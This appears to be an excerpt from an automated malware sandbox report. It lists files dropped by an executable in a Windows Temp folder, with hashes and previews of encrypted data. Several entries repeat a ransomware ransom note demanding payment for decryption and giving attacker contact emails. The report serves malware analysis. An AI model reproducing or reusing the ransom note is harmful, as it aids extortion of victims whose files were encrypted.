                                                                                                                                              Preview:.a...8&...).7....6..)p)v...t.H..V.........:^..,.cN.....T..8.y .-.....P...M...t+......T..bZ'4.z..e.i.cE........9cd..i..R..v..`......H..............R....o9?..fZ..P.......,..hdw..f/^....h...h.D..j.$s,.|,^.....w.e~....5m.BW'...OP...^5..{.z#LE...rEiT...h.=.'?.......T..j}..pQO...MU.U..u.P>....I. .V.=.7.hE.......Ua3....0.Z.*V........b8.=.[....=p..p..3...%.a..mW.B"..!...x@...s. s....G..-e.6SY...L..j.........4Y...D....v.`.e.-.d..bJj....:...7O....Z].|..t.T....M.....o.......K.....2.Z8.Qr5.r...a..?..3...._8....%.{.u.H.+.".."..F...Z2.%..{(ta..".v....#9_C.IU..!h@...~..$e...Wn...s]YO..W....u~..-..4....;)z)..l[.!n..@s(.|..B..!M...zH.J....?\M.%a&Ad5}.N.}.E.y......A=.6....y......l..../..m.k..V...<.V.....I.c......V.h...E...c.cJp...h.M.....}...z&..:...g..".IS...........S:.Op.....o...}...-..\Ff....*~N..K.,....R..0u.....:QO.Q.(...(."...Taw.y.?..o.'KL.D.9H.9...{.P.Y..0..Z...(9.....)^U`.#c..'{.4.}.}.$.....1gh&.m.s|q...@mI..9.3.....2.$..q..(.Bf.p.[..&_.74..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.843664327398857
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:CdQ6QpRVpoLeQqMaMK3ZckCl0zI3MRzJA2MzQsOdkH0Cj:C+6Iu7aMsjzJgzQDkHP
                                                                                                                                              MD5:F9B30B92FDC89689334BEB54F46D0D8B
                                                                                                                                              SHA1:8DA7DDC5DA30039EB0719EEDE797ABE56277FDA0
                                                                                                                                              SHA-256:DC6B24831693C4DEEBCAB8B600D326BFABEFDB1143010B6873E7A180309C9357
                                                                                                                                              SHA-512:FA67A9154FA0D423B413327557A23EC2D09C336ED9CFA138349551CD2B6728E9ACFF4A9AB0658A07B652FE3F9B96529E1E2E301200FDA0B0908CFED5413B79EA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.=x_.O.K..V1C....9Mo;.Tlr.W.[2z.=.%3.....0..2...^.I!.....!.Z...e..1...DN....}.....>..Vk.N....<;..&A?..1....>q..C.T.~.....<.&$..C_.R ...h\.>W.!......{.^.....v1%!..L..p...;..A.f...Z................5p...L;......,fo...>.L..j#R .1.,Q..N.v.@....g..F.Lyk..T..@...1.~a._%....=.V....cO_.J^*........T..g.'<=.......8...O.^.#.^...6.u...>..)..`3...n.X.....b.9..P..B_..}O..."......=....Z.I._..P.4...##.T.]s..(.FC..t....6.j.D..S.!..E...a......N(.....K'.R....[q.aa......T...0..j.VB.MH|..9.K.nl...\|......0!zK.#$.i.|.../....{..Q...{B.R......w+5.+N.L0...|..N.u\&.Di)_Q.f.s.[}~.....2......h.....~.vW..p.wc.........$...m...QL8.Bh.I~`3.xo....c.cN..c..g\BxC..2L5.....8._.(q...."D........yvW.6rz./6Z..K.Q..U....:-....DR-g .L_.y..zE......!.o@VL.R..@R[. 650.a..h.....r.$/$...*S.......F.....3..jN....|.j7%...z^(...K..m...a.E....;..B..3...`.n.:9.7R...b../|+.w../..~.....*....1..:G..(..sX...~....X..Ct..-..uC.~......=....O.8....f..."......[$.F>.....d`.n....CeID<F.J.h.?
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.843664327398857
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:CdQ6QpRVpoLeQqMaMK3ZckCl0zI3MRzJA2MzQsOdkH0Cj:C+6Iu7aMsjzJgzQDkHP
                                                                                                                                              MD5:F9B30B92FDC89689334BEB54F46D0D8B
                                                                                                                                              SHA1:8DA7DDC5DA30039EB0719EEDE797ABE56277FDA0
                                                                                                                                              SHA-256:DC6B24831693C4DEEBCAB8B600D326BFABEFDB1143010B6873E7A180309C9357
                                                                                                                                              SHA-512:FA67A9154FA0D423B413327557A23EC2D09C336ED9CFA138349551CD2B6728E9ACFF4A9AB0658A07B652FE3F9B96529E1E2E301200FDA0B0908CFED5413B79EA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.=x_.O.K..V1C....9Mo;.Tlr.W.[2z.=.%3.....0..2...^.I!.....!.Z...e..1...DN....}.....>..Vk.N....<;..&A?..1....>q..C.T.~.....<.&$..C_.R ...h\.>W.!......{.^.....v1%!..L..p...;..A.f...Z................5p...L;......,fo...>.L..j#R .1.,Q..N.v.@....g..F.Lyk..T..@...1.~a._%....=.V....cO_.J^*........T..g.'<=.......8...O.^.#.^...6.u...>..)..`3...n.X.....b.9..P..B_..}O..."......=....Z.I._..P.4...##.T.]s..(.FC..t....6.j.D..S.!..E...a......N(.....K'.R....[q.aa......T...0..j.VB.MH|..9.K.nl...\|......0!zK.#$.i.|.../....{..Q...{B.R......w+5.+N.L0...|..N.u\&.Di)_Q.f.s.[}~.....2......h.....~.vW..p.wc.........$...m...QL8.Bh.I~`3.xo....c.cN..c..g\BxC..2L5.....8._.(q...."D........yvW.6rz./6Z..K.Q..U....:-....DR-g .L_.y..zE......!.o@VL.R..@R[. 650.a..h.....r.$/$...*S.......F.....3..jN....|.j7%...z^(...K..m...a.E....;..B..3...`.n.:9.7R...b../|+.w../..~.....*....1..:G..(..sX...~....X..Ct..-..uC.~......=....O.8....f..."......[$.F>.....d`.n....CeID<F.J.h.?
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.868358878369258
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:ZDX6BmjISe+xO91rrhZlvi5S5k5vfp4SFizw6A1SvGJvm+Dpr4aH:ZW+3e+sVBi5S+5vR4isZkSvGBprHH
                                                                                                                                              MD5:D35E7EC8ADC857D45D6983C0680E91B7
                                                                                                                                              SHA1:2FB46D7F15D537FB924546CD2BEB7F4C67BDB064
                                                                                                                                              SHA-256:848DB2073D6FE930D305C97B16E1A18B15A98A390105D38811BCD79A9BAF9B79
                                                                                                                                              SHA-512:3D837437D96E6E6311E072B7509FB5E4556FCCF02DB693DA768733B4CA0CE4E9F1AC224174F7EFC0C82B50312CA35B678C3A14BB824E1542F71DF3BB4F9D673B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:D...g..&g.&{.*.b.ef e...:...L.%(.......0...F2#E.....$[!~N..*S.>...?....x......,..+..qe1.K.D..)..i......T.......exq.d.d.......7..{...uy)....A.T.>....'].*.C.O.q...<B.K@/*..I...=.D...*.k._J.~.~.w9.b..f`..o.rO...m...x}.D..A..+W.).q.K...(...h...Q.W...c...>3y\<d.u.s@.C>i.+.1ma#..xDl..5.?.\..ETItR.....j.G.J.j..G..............:.].0g.:....QY..0.eF..9ts.%..;. .;..\_..E.._..FS....a. .iB..po..>.:..o.g....K....4Tb.8........|.%..%.CE9+.g.T...[....).a!(....1..&...RYG..V.Y{w...8t.i.81V...<....E...E...."..a.....q....T....N...E.RZ6Z...Y....Q.v.q.<....1..&.P....L[|....._b.WA{\7...].....wtk.../.[H...K....d........TL.I-^..-.-.........6...Z.....v.B..=I.."....+..3*T,..9...\...w../....0..Q..J..(...H....-X.Ra..........&...h*.\O.`..a.V4@;@.....B=Z...+.q.....R..I....w..S........m._.....j.et.s../.:.,.e.k........)..+..1.....UUUQ.C$........C.C.suej.;..EG..Q.=|..5)]...@.u..w=..J..w;'...^Z.\...w.L.7$.#....8..Fk..Y[.....8....Z.{...#..{MXn.......W;O.......F.J.......
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.868358878369258
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:ZDX6BmjISe+xO91rrhZlvi5S5k5vfp4SFizw6A1SvGJvm+Dpr4aH:ZW+3e+sVBi5S+5vR4isZkSvGBprHH
                                                                                                                                              MD5:D35E7EC8ADC857D45D6983C0680E91B7
                                                                                                                                              SHA1:2FB46D7F15D537FB924546CD2BEB7F4C67BDB064
                                                                                                                                              SHA-256:848DB2073D6FE930D305C97B16E1A18B15A98A390105D38811BCD79A9BAF9B79
                                                                                                                                              SHA-512:3D837437D96E6E6311E072B7509FB5E4556FCCF02DB693DA768733B4CA0CE4E9F1AC224174F7EFC0C82B50312CA35B678C3A14BB824E1542F71DF3BB4F9D673B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:D...g..&g.&{.*.b.ef e...:...L.%(.......0...F2#E.....$[!~N..*S.>...?....x......,..+..qe1.K.D..)..i......T.......exq.d.d.......7..{...uy)....A.T.>....'].*.C.O.q...<B.K@/*..I...=.D...*.k._J.~.~.w9.b..f`..o.rO...m...x}.D..A..+W.).q.K...(...h...Q.W...c...>3y\<d.u.s@.C>i.+.1ma#..xDl..5.?.\..ETItR.....j.G.J.j..G..............:.].0g.:....QY..0.eF..9ts.%..;. .;..\_..E.._..FS....a. .iB..po..>.:..o.g....K....4Tb.8........|.%..%.CE9+.g.T...[....).a!(....1..&...RYG..V.Y{w...8t.i.81V...<....E...E...."..a.....q....T....N...E.RZ6Z...Y....Q.v.q.<....1..&.P....L[|....._b.WA{\7...].....wtk.../.[H...K....d........TL.I-^..-.-.........6...Z.....v.B..=I.."....+..3*T,..9...\...w../....0..Q..J..(...H....-X.Ra..........&...h*.\O.`..a.V4@;@.....B=Z...+.q.....R..I....w..S........m._.....j.et.s../.:.,.e.k........)..+..1.....UUUQ.C$........C.C.suej.;..EG..Q.=|..5)]...@.u..w=..J..w;'...^Z.\...w.L.7$.#....8..Fk..Y[.....8....Z.{...#..{MXn.......W;O.......F.J.......
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.832369819449866
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:x4S+iYy3x9b+taOYBCKVIHnsZ+RfiJez0ECTRFt6in4EWC8yhK:x4StNB9jOuXGnsZ+1Wez0EQ53n2Bb
                                                                                                                                              MD5:FB0795006829B1805F258B4F3D129A7E
                                                                                                                                              SHA1:7E72DDE28E1E86E450D9426FE7022F710A8B3DDA
                                                                                                                                              SHA-256:B90DE0CE0BE066CC7015EC5B52AEA7B3465B688CDA86525C7FA4521F98B9F9F1
                                                                                                                                              SHA-512:89AF2DF49EAC73D6B711B06AC0A54CF0C45436E84E12AABA58054D2F23C7A77DF3D6CAE8D9633966658299B6521A4B5EBB55577C153A3A98CB9078CC1EC7B934
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.:.+Pg..^%..?..*7.0.p.OH....xy..IH..C.z...:FIL..Z.|....#>*%.Kr...{.L...SB sO:...._.(.Z.np....%..=.'n..#.R....;..sz...r43....[.........f.A1v.7.. .~.t.{.j..P:..../.jn3m@.H....... %..c ..r. ....V..[Y..0....I?8\.-.$&...-.re.T./A.Q&`....pz%7.H..X.W..c..q..4`..O'.W..?.q..8..f..Oc....jd}....h]...o}i..;.w.&.{Q..].l.3.i.Sj.A$.a.Y...p.^.8*.".I..9.x..+&i...%.U.ou.....j....9.....u.....*...TW.f....~.....t..o.l..Z_...:..K3.....\..!k.;...t.h..[.........&..A.;."F..7.H|jJ../..za.Y...sv.*.J.x6.z j!f$.......t.A.......gU..A.~,..b.6>2><..:..c...d6.\[..?...J&I..........,dz..)V..tN..P...B.e..4.9..W0.].....r\nbP`s(...7..... ..v .n...K...R...Uve...|%G...|O..s...d.F\f....n:c.>x{V.RX.k.Uo.{i=.....H/.7.W/..I.....V+4.$Oq.g.....@..........&N.o....0.Zt.....#=..X.E.|B{.eq..i_.5~.9..v...[Vg........-T3.9....m...P.J:\h./t..a....q...Y..;s.l.i....E.&.#...T>...G.?./<...^.".`.....h:...`l......O....>..<.....h9 u).i/..VV.......9w.^..@.*...`+6?.<....]..h.V.?..t.G....Oy.u.I^..so.|+..[..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.832369819449866
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:x4S+iYy3x9b+taOYBCKVIHnsZ+RfiJez0ECTRFt6in4EWC8yhK:x4StNB9jOuXGnsZ+1Wez0EQ53n2Bb
                                                                                                                                              MD5:FB0795006829B1805F258B4F3D129A7E
                                                                                                                                              SHA1:7E72DDE28E1E86E450D9426FE7022F710A8B3DDA
                                                                                                                                              SHA-256:B90DE0CE0BE066CC7015EC5B52AEA7B3465B688CDA86525C7FA4521F98B9F9F1
                                                                                                                                              SHA-512:89AF2DF49EAC73D6B711B06AC0A54CF0C45436E84E12AABA58054D2F23C7A77DF3D6CAE8D9633966658299B6521A4B5EBB55577C153A3A98CB9078CC1EC7B934
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.:.+Pg..^%..?..*7.0.p.OH....xy..IH..C.z...:FIL..Z.|....#>*%.Kr...{.L...SB sO:...._.(.Z.np....%..=.'n..#.R....;..sz...r43....[.........f.A1v.7.. .~.t.{.j..P:..../.jn3m@.H....... %..c ..r. ....V..[Y..0....I?8\.-.$&...-.re.T./A.Q&`....pz%7.H..X.W..c..q..4`..O'.W..?.q..8..f..Oc....jd}....h]...o}i..;.w.&.{Q..].l.3.i.Sj.A$.a.Y...p.^.8*.".I..9.x..+&i...%.U.ou.....j....9.....u.....*...TW.f....~.....t..o.l..Z_...:..K3.....\..!k.;...t.h..[.........&..A.;."F..7.H|jJ../..za.Y...sv.*.J.x6.z j!f$.......t.A.......gU..A.~,..b.6>2><..:..c...d6.\[..?...J&I..........,dz..)V..tN..P...B.e..4.9..W0.].....r\nbP`s(...7..... ..v .n...K...R...Uve...|%G...|O..s...d.F\f....n:c.>x{V.RX.k.Uo.{i=.....H/.7.W/..I.....V+4.$Oq.g.....@..........&N.o....0.Zt.....#=..X.E.|B{.eq..i_.5~.9..v...[Vg........-T3.9....m...P.J:\h./t..a....q...Y..;s.l.i....E.&.#...T>...G.?./<...^.".`.....h:...`l......O....>..<.....h9 u).i/..VV.......9w.^..@.*...`+6?.<....]..h.V.?..t.G....Oy.u.I^..so.|+..[..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.870408531597342
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:OpAqPfuyEbBps6tTX3Yp2fPfLbeurExZhNJpzlP9oCtW1fIekTTV:+fuyEbBp/IpQPfWz7BhP+KfRTV
                                                                                                                                              MD5:D57388DC6FBD90B4F99B07ED45BBA026
                                                                                                                                              SHA1:712754D38F231FEEF004B771F15835FD3962E73B
                                                                                                                                              SHA-256:A0F286AEC93E9C509A0691AD3A84A8D693835E0EDFE647A001CE64D880680D6C
                                                                                                                                              SHA-512:C1D3D123534EB088B686E6FDBF580D1F1D4550C4C9C58A14955ACBF460A33CE854683E2553F713E2A121F098398629D037B3BE84FBB559EE7E35325B80B3AF23
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:p....2R.L.."fH]F....J. .6..w...Y..#..._.....L.le..N..v{.....S.=.....5....1PC.X....&..{..,..5......$U;.i.{......k..G.+......G. `.-..VF>"{.o..K....\.C..m..T..Y~....2....ZP.t..@.g5[c..+....a+.5......@......FQ...Y....o7k....P.....9..5WL.P"e............q..[|....0..cK(.M.Y.r:0..>=.._.R..{.~$....k..}..l.|..f..).C...3...l..s~............e.....{8..B.c......yr..I5l..U..Jq.l....|2!/l#..,.g....u=ic?.G.PA,.j.@b.~......2..\.L...;....G...A...jEV..i...sr.._.m......OSg.....3/H...S....v"\....uP..d=........S....@.......~..T 7........nW..=..sU^...&rf.6.}....53.......{.....@.....h..oT.LW.p.e.e..e..L.+..z2..zu.._.....Pa.+2......_O..}...s...`..W..3..O.C....W....e...x.N....x...G.H.Nb!........i..?.Ce.BR!....[..t..YOI'.c[..*..m@..qH...|.%S.2.....|..8..{.c6.[.K..E.....T"4.)..Fe.@.?.|&....._.q...m......Qv....V@...,I.0U.....qfTAr...F..d.q...h@y.A..JF.=q..m.rM.....t.WJ._.(..d.....>%]..[.c.X...?......I.XW@$.D...k..:B.}.E@..?GC...;V6^..]..<..5O...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.870408531597342
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:OpAqPfuyEbBps6tTX3Yp2fPfLbeurExZhNJpzlP9oCtW1fIekTTV:+fuyEbBp/IpQPfWz7BhP+KfRTV
                                                                                                                                              MD5:D57388DC6FBD90B4F99B07ED45BBA026
                                                                                                                                              SHA1:712754D38F231FEEF004B771F15835FD3962E73B
                                                                                                                                              SHA-256:A0F286AEC93E9C509A0691AD3A84A8D693835E0EDFE647A001CE64D880680D6C
                                                                                                                                              SHA-512:C1D3D123534EB088B686E6FDBF580D1F1D4550C4C9C58A14955ACBF460A33CE854683E2553F713E2A121F098398629D037B3BE84FBB559EE7E35325B80B3AF23
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:p....2R.L.."fH]F....J. .6..w...Y..#..._.....L.le..N..v{.....S.=.....5....1PC.X....&..{..,..5......$U;.i.{......k..G.+......G. `.-..VF>"{.o..K....\.C..m..T..Y~....2....ZP.t..@.g5[c..+....a+.5......@......FQ...Y....o7k....P.....9..5WL.P"e............q..[|....0..cK(.M.Y.r:0..>=.._.R..{.~$....k..}..l.|..f..).C...3...l..s~............e.....{8..B.c......yr..I5l..U..Jq.l....|2!/l#..,.g....u=ic?.G.PA,.j.@b.~......2..\.L...;....G...A...jEV..i...sr.._.m......OSg.....3/H...S....v"\....uP..d=........S....@.......~..T 7........nW..=..sU^...&rf.6.}....53.......{.....@.....h..oT.LW.p.e.e..e..L.+..z2..zu.._.....Pa.+2......_O..}...s...`..W..3..O.C....W....e...x.N....x...G.H.Nb!........i..?.Ce.BR!....[..t..YOI'.c[..*..m@..qH...|.%S.2.....|..8..{.c6.[.K..E.....T"4.)..Fe.@.?.|&....._.q...m......Qv....V@...,I.0U.....qfTAr...F..d.q...h@y.A..JF.=q..m.rM.....t.WJ._.(..d.....>%]..[.c.X...?......I.XW@$.D...k..:B.}.E@..?GC...;V6^..]..<..5O...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.870607736913891
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:wCZBjkKO7Wg1mVPq/qpJ4X/JHCDfdw0kT9jJuN4tJ7519kroQR0VGIYI:wwvONwx2qp+RiDfdwsN4tBgoQdlI
                                                                                                                                              MD5:FA3D98F9AAD1BC35986097ED7A86CBA0
                                                                                                                                              SHA1:D26CA32AF0CED9A4005E080FE2DF83A82F26C514
                                                                                                                                              SHA-256:8333779B56E586433E54DE4FBEEB1D7CD4048558628F7043E68F341B4651001E
                                                                                                                                              SHA-512:06BDBF70628110259051390A7E8B24D8C412EA14E1B17475D30E4AF4C6A1456001305DF6FF53A862B31BC67ED497BC3A2DA744ABCBEB8F1145C410551A36E9A8
                                                                                                                                              Malicious:false
